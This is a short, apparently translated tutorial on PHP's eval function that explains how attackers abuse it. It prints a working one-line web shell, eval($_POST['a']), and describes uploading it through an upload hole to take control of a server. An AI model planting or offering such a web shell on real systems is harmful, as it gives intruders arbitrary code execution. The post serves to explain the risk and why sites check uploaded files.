Eval may be rarely used when we usually write web pages, but when it comes to security, eval in php is very common. Let's talk about what eval is?
First, the basic use of eval
To talk about eval, we must first start with a piece of code that even a newbie who can only write php Helloworld can understand.
First, what is the result of running this code?
<?php
$str = "echo 'abc';";
echo $str;
?>It is estimated that you don't even need to see a screenshot of the running result, that is, echo 'abc';
However, if echo is changed to eval, that is:
<?php
$str = "echo 'abc';";
eval ($str);
?>Then the result of running the program becomes abc:
That is, the echo 'abc' above is executed by php!
2. The use of eval by hackers
Normally, when we write php web pages, we write whatever code we need to write. In rare cases, we embed pieces of code in eval to confuse ourselves and our teammates who are developing with us. Therefore, eval may be an unpopular keyword for developers.
But eval is very useful for hackers. For example, on your server, hang a php, or find a security loophole, upload a php to your server, the php is as follows.
<?php
eval ($_POST['a']);
?>It's that simple.
First of all, this php will receive things with name=a in the form of post. Of course, if the hacker finds it troublesome to change it to get, you can directly pass the parameters in the address bar of the browser. Passing parameters in post and get is a very basic thing, so I won't go into details . article/details/41908237 ).
Then, due to the existence of eval, this php will execute the thing passed in the form of post with name=a. In this case, since php can directly manipulate the files on the server, as long as the hacker can put the php on your server, and use the packet capture tool to find the address after the php upload, it basically means that the hacker can control your server. of.
It basically has the same meaning as the kitchen knife of jsp
So, basically, where you see uploads on most websites, file upload type identification is done.